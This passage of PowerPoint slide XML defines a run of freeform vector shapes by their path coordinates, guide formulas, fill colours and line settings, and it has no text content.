                      <a:pt x="64" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="3"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10728" name="Freeform 135"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1295" y="2277"/>
                <a:ext cx="132" cy="90"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 132"/>
                  <a:gd name="T1" fmla="*/ 67 h 90"/>
                  <a:gd name="T2" fmla="*/ 0 w 132"/>
                  <a:gd name="T3" fmla="*/ 78 h 90"/>
                  <a:gd name="T4" fmla="*/ 86 w 132"/>
                  <a:gd name="T5" fmla="*/ 90 h 90"/>
                  <a:gd name="T6" fmla="*/ 86 w 132"/>
                  <a:gd name="T7" fmla="*/ 90 h 90"/>
                  <a:gd name="T8" fmla="*/ 89 w 132"/>
                  <a:gd name="T9" fmla="*/ 88 h 90"/>
                  <a:gd name="T10" fmla="*/ 91 w 132"/>
                  <a:gd name="T11" fmla="*/ 87 h 90"/>
                  <a:gd name="T12" fmla="*/ 94 w 132"/>
                  <a:gd name="T13" fmla="*/ 85 h 90"/>
                  <a:gd name="T14" fmla="*/ 98 w 132"/>
                  <a:gd name="T15" fmla="*/ 83 h 90"/>
                  <a:gd name="T16" fmla="*/ 103 w 132"/>
                  <a:gd name="T17" fmla="*/ 79 h 90"/>
                  <a:gd name="T18" fmla="*/ 107 w 132"/>
                  <a:gd name="T19" fmla="*/ 74 h 90"/>
                  <a:gd name="T20" fmla="*/ 112 w 132"/>
                  <a:gd name="T21" fmla="*/ 71 h 90"/>
                  <a:gd name="T22" fmla="*/ 117 w 132"/>
                  <a:gd name="T23" fmla="*/ 65 h 90"/>
                  <a:gd name="T24" fmla="*/ 121 w 132"/>
                  <a:gd name="T25" fmla="*/ 59 h 90"/>
                  <a:gd name="T26" fmla="*/ 125 w 132"/>
                  <a:gd name="T27" fmla="*/ 53 h 90"/>
                  <a:gd name="T28" fmla="*/ 128 w 132"/>
                  <a:gd name="T29" fmla="*/ 46 h 90"/>
                  <a:gd name="T30" fmla="*/ 131 w 132"/>
                  <a:gd name="T31" fmla="*/ 39 h 90"/>
                  <a:gd name="T32" fmla="*/ 132 w 132"/>
                  <a:gd name="T33" fmla="*/ 31 h 90"/>
                  <a:gd name="T34" fmla="*/ 132 w 132"/>
                  <a:gd name="T35" fmla="*/ 22 h 90"/>
                  <a:gd name="T36" fmla="*/ 129 w 132"/>
                  <a:gd name="T37" fmla="*/ 12 h 90"/>
                  <a:gd name="T38" fmla="*/ 129 w 132"/>
                  <a:gd name="T39" fmla="*/ 12 h 90"/>
                  <a:gd name="T40" fmla="*/ 128 w 132"/>
                  <a:gd name="T41" fmla="*/ 10 h 90"/>
                  <a:gd name="T42" fmla="*/ 127 w 132"/>
                  <a:gd name="T43" fmla="*/ 9 h 90"/>
                  <a:gd name="T44" fmla="*/ 126 w 132"/>
                  <a:gd name="T45" fmla="*/ 7 h 90"/>
                  <a:gd name="T46" fmla="*/ 124 w 132"/>
                  <a:gd name="T47" fmla="*/ 3 h 90"/>
                  <a:gd name="T48" fmla="*/ 120 w 132"/>
                  <a:gd name="T49" fmla="*/ 2 h 90"/>
                  <a:gd name="T50" fmla="*/ 117 w 132"/>
                  <a:gd name="T51" fmla="*/ 0 h 90"/>
                  <a:gd name="T52" fmla="*/ 113 w 132"/>
                  <a:gd name="T53" fmla="*/ 0 h 90"/>
                  <a:gd name="T54" fmla="*/ 113 w 132"/>
                  <a:gd name="T55" fmla="*/ 1 h 90"/>
                  <a:gd name="T56" fmla="*/ 114 w 132"/>
                  <a:gd name="T57" fmla="*/ 4 h 90"/>
                  <a:gd name="T58" fmla="*/ 117 w 132"/>
                  <a:gd name="T59" fmla="*/ 11 h 90"/>
                  <a:gd name="T60" fmla="*/ 118 w 132"/>
                  <a:gd name="T61" fmla="*/ 18 h 90"/>
                  <a:gd name="T62" fmla="*/ 118 w 132"/>
                  <a:gd name="T63" fmla="*/ 29 h 90"/>
                  <a:gd name="T64" fmla="*/ 117 w 132"/>
                  <a:gd name="T65" fmla="*/ 39 h 90"/>
                  <a:gd name="T66" fmla="*/ 114 w 132"/>
                  <a:gd name="T67" fmla="*/ 51 h 90"/>
                  <a:gd name="T68" fmla="*/ 108 w 132"/>
                  <a:gd name="T69" fmla="*/ 63 h 90"/>
                  <a:gd name="T70" fmla="*/ 108 w 132"/>
                  <a:gd name="T71" fmla="*/ 63 h 90"/>
                  <a:gd name="T72" fmla="*/ 108 w 132"/>
                  <a:gd name="T73" fmla="*/ 64 h 90"/>
                  <a:gd name="T74" fmla="*/ 107 w 132"/>
                  <a:gd name="T75" fmla="*/ 64 h 90"/>
                  <a:gd name="T76" fmla="*/ 106 w 132"/>
                  <a:gd name="T77" fmla="*/ 65 h 90"/>
                  <a:gd name="T78" fmla="*/ 105 w 132"/>
                  <a:gd name="T79" fmla="*/ 66 h 90"/>
                  <a:gd name="T80" fmla="*/ 103 w 132"/>
                  <a:gd name="T81" fmla="*/ 67 h 90"/>
                  <a:gd name="T82" fmla="*/ 100 w 132"/>
                  <a:gd name="T83" fmla="*/ 69 h 90"/>
                  <a:gd name="T84" fmla="*/ 98 w 132"/>
                  <a:gd name="T85" fmla="*/ 70 h 90"/>
                  <a:gd name="T86" fmla="*/ 96 w 132"/>
                  <a:gd name="T87" fmla="*/ 70 h 90"/>
                  <a:gd name="T88" fmla="*/ 92 w 132"/>
                  <a:gd name="T89" fmla="*/ 71 h 90"/>
                  <a:gd name="T90" fmla="*/ 90 w 132"/>
                  <a:gd name="T91" fmla="*/ 72 h 90"/>
                  <a:gd name="T92" fmla="*/ 85 w 132"/>
                  <a:gd name="T93" fmla="*/ 72 h 90"/>
                  <a:gd name="T94" fmla="*/ 82 w 132"/>
                  <a:gd name="T95" fmla="*/ 72 h 90"/>
                  <a:gd name="T96" fmla="*/ 78 w 132"/>
                  <a:gd name="T97" fmla="*/ 72 h 90"/>
                  <a:gd name="T98" fmla="*/ 73 w 132"/>
                  <a:gd name="T99" fmla="*/ 72 h 90"/>
                  <a:gd name="T100" fmla="*/ 69 w 132"/>
                  <a:gd name="T101" fmla="*/ 71 h 90"/>
                  <a:gd name="T102" fmla="*/ 69 w 132"/>
                  <a:gd name="T103" fmla="*/ 83 h 90"/>
                  <a:gd name="T104" fmla="*/ 3 w 132"/>
                  <a:gd name="T105" fmla="*/ 76 h 90"/>
                  <a:gd name="T106" fmla="*/ 1 w 132"/>
                  <a:gd name="T107" fmla="*/ 67 h 9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2"/>
                  <a:gd name="T163" fmla="*/ 0 h 90"/>
                  <a:gd name="T164" fmla="*/ 132 w 132"/>
                  <a:gd name="T165" fmla="*/ 90 h 9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2" h="90">
                    <a:moveTo>
                      <a:pt x="1" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="67"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="99D8D8"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10729" name="Freeform 136"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1279" y="2365"/>
                <a:ext cx="96" cy="31"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 96 w 96"/>
                  <a:gd name="T1" fmla="*/ 11 h 31"/>
                  <a:gd name="T2" fmla="*/ 1 w 96"/>
                  <a:gd name="T3" fmla="*/ 0 h 31"/>
                  <a:gd name="T4" fmla="*/ 0 w 96"/>
                  <a:gd name="T5" fmla="*/ 11 h 31"/>
                  <a:gd name="T6" fmla="*/ 93 w 96"/>
                  <a:gd name="T7" fmla="*/ 31 h 31"/>
                  <a:gd name="T8" fmla="*/ 96 w 96"/>
                  <a:gd name="T9" fmla="*/ 11 h 31"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 96"/>
                  <a:gd name="T16" fmla="*/ 0 h 31"/>
                  <a:gd name="T17" fmla="*/ 96 w 96"/>
                  <a:gd name="T18" fmla="*/ 31 h 31"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="96" h="31">
                    <a:moveTo>
                      <a:pt x="96" y="11"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="11"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10730" name="Freeform 137"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1326" y="2375"/>
                <a:ext cx="42" cy="14"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 42 w 42"/>
                  <a:gd name="T1" fmla="*/ 6 h 14"/>
                  <a:gd name="T2" fmla="*/ 2 w 42"/>
                  <a:gd name="T3" fmla="*/ 0 h 14"/>
                  <a:gd name="T4" fmla="*/ 0 w 42"/>
                  <a:gd name="T5" fmla="*/ 6 h 14"/>
                  <a:gd name="T6" fmla="*/ 40 w 42"/>
                  <a:gd name="T7" fmla="*/ 14 h 14"/>
                  <a:gd name="T8" fmla="*/ 42 w 42"/>
                  <a:gd name="T9" fmla="*/ 6 h 14"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 42"/>
                  <a:gd name="T16" fmla="*/ 0 h 14"/>
                  <a:gd name="T17" fmla="*/ 42 w 42"/>
                  <a:gd name="T18" fmla="*/ 14 h 14"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="42" h="14">
                    <a:moveTo>
                      <a:pt x="42" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="6"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="99D8D8"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10731" name="Freeform 138"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1284" y="2368"/>
                <a:ext cx="28" cy="10"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 28 w 28"/>
                  <a:gd name="T1" fmla="*/ 4 h 10"/>
                  <a:gd name="T2" fmla="*/ 0 w 28"/>
                  <a:gd name="T3" fmla="*/ 0 h 10"/>
                  <a:gd name="T4" fmla="*/ 0 w 28"/>
                  <a:gd name="T5" fmla="*/ 6 h 10"/>
                  <a:gd name="T6" fmla="*/ 27 w 28"/>
                  <a:gd name="T7" fmla="*/ 10 h 10"/>
                  <a:gd name="T8" fmla="*/ 28 w 28"/>
                  <a:gd name="T9" fmla="*/ 4 h 10"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 28"/>
                  <a:gd name="T16" fmla="*/ 0 h 10"/>
                  <a:gd name="T17" fmla="*/ 28 w 28"/>
                  <a:gd name="T18" fmla="*/ 10 h 10"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="28" h="10">
                    <a:moveTo>
                      <a:pt x="28" y="4"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="4"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="99D8D8"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10732" name="Freeform 139"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1216" y="2378"/>
                <a:ext cx="162" cy="54"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 162"/>
                  <a:gd name="T1" fmla="*/ 17 h 54"/>
                  <a:gd name="T2" fmla="*/ 0 w 162"/>
                  <a:gd name="T3" fmla="*/ 17 h 54"/>
                  <a:gd name="T4" fmla="*/ 1 w 162"/>
                  <a:gd name="T5" fmla="*/ 17 h 54"/>
                  <a:gd name="T6" fmla="*/ 2 w 162"/>
                  <a:gd name="T7" fmla="*/ 17 h 54"/>
                  <a:gd name="T8" fmla="*/ 4 w 162"/>
                  <a:gd name="T9" fmla="*/ 15 h 54"/>
                  <a:gd name="T10" fmla="*/ 7 w 162"/>
                  <a:gd name="T11" fmla="*/ 15 h 54"/>
                  <a:gd name="T12" fmla="*/ 10 w 162"/>
                  <a:gd name="T13" fmla="*/ 14 h 54"/>
                  <a:gd name="T14" fmla="*/ 14 w 162"/>
                  <a:gd name="T15" fmla="*/ 14 h 54"/>
                  <a:gd name="T16" fmla="*/ 17 w 162"/>
                  <a:gd name="T17" fmla="*/ 13 h 54"/>
                  <a:gd name="T18" fmla="*/ 21 w 162"/>
                  <a:gd name="T19" fmla="*/ 12 h 54"/>
                  <a:gd name="T20" fmla="*/ 24 w 162"/>
                  <a:gd name="T21" fmla="*/ 11 h 54"/>
                  <a:gd name="T22" fmla="*/ 28 w 162"/>
                  <a:gd name="T23" fmla="*/ 10 h 54"/>
                  <a:gd name="T24" fmla="*/ 31 w 162"/>
                  <a:gd name="T25" fmla="*/ 8 h 54"/>
                  <a:gd name="T26" fmla="*/ 35 w 162"/>
                  <a:gd name="T27" fmla="*/ 6 h 54"/>
                  <a:gd name="T28" fmla="*/ 37 w 162"/>
                  <a:gd name="T29" fmla="*/ 5 h 54"/>
                  <a:gd name="T30" fmla="*/ 40 w 162"/>
                  <a:gd name="T31" fmla="*/ 3 h 54"/>
                  <a:gd name="T32" fmla="*/ 43 w 162"/>
                  <a:gd name="T33" fmla="*/ 0 h 54"/>
                  <a:gd name="T34" fmla="*/ 162 w 162"/>
                  <a:gd name="T35" fmla="*/ 28 h 54"/>
                  <a:gd name="T36" fmla="*/ 162 w 162"/>
                  <a:gd name="T37" fmla="*/ 28 h 54"/>
                  <a:gd name="T38" fmla="*/ 161 w 162"/>
                  <a:gd name="T39" fmla="*/ 28 h 54"/>
                  <a:gd name="T40" fmla="*/ 159 w 162"/>
                  <a:gd name="T41" fmla="*/ 29 h 54"/>
                  <a:gd name="T42" fmla="*/ 158 w 162"/>
                  <a:gd name="T43" fmla="*/ 31 h 54"/>
                  <a:gd name="T44" fmla="*/ 157 w 162"/>
                  <a:gd name="T45" fmla="*/ 33 h 54"/>
                  <a:gd name="T46" fmla="*/ 155 w 162"/>
                  <a:gd name="T47" fmla="*/ 34 h 54"/>
                  <a:gd name="T48" fmla="*/ 152 w 162"/>
                  <a:gd name="T49" fmla="*/ 36 h 54"/>
                  <a:gd name="T50" fmla="*/ 150 w 162"/>
                  <a:gd name="T51" fmla="*/ 39 h 54"/>
                  <a:gd name="T52" fmla="*/ 147 w 162"/>
                  <a:gd name="T53" fmla="*/ 41 h 54"/>
                  <a:gd name="T54" fmla="*/ 144 w 162"/>
                  <a:gd name="T55" fmla="*/ 43 h 54"/>
                  <a:gd name="T56" fmla="*/ 141 w 162"/>
                  <a:gd name="T57" fmla="*/ 46 h 54"/>
                  <a:gd name="T58" fmla="*/ 137 w 162"/>
                  <a:gd name="T59" fmla="*/ 48 h 54"/>
                  <a:gd name="T60" fmla="*/ 135 w 162"/>
                  <a:gd name="T61" fmla="*/ 49 h 54"/>
                  <a:gd name="T62" fmla="*/ 131 w 162"/>
                  <a:gd name="T63" fmla="*/ 52 h 54"/>
                  <a:gd name="T64" fmla="*/ 128 w 162"/>
                  <a:gd name="T65" fmla="*/ 53 h 54"/>
                  <a:gd name="T66" fmla="*/ 126 w 162"/>
                  <a:gd name="T67" fmla="*/ 54 h 54"/>
                  <a:gd name="T68" fmla="*/ 0 w 162"/>
                  <a:gd name="T69" fmla="*/ 17 h 5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2"/>
                  <a:gd name="T106" fmla="*/ 0 h 54"/>
                  <a:gd name="T107" fmla="*/ 162 w 162"/>
                  <a:gd name="T108" fmla="*/ 54 h 5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2" h="54">
                    <a:moveTo>
                      <a:pt x="0" y="17"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="99D8D8"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10733" name="Freeform 140"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
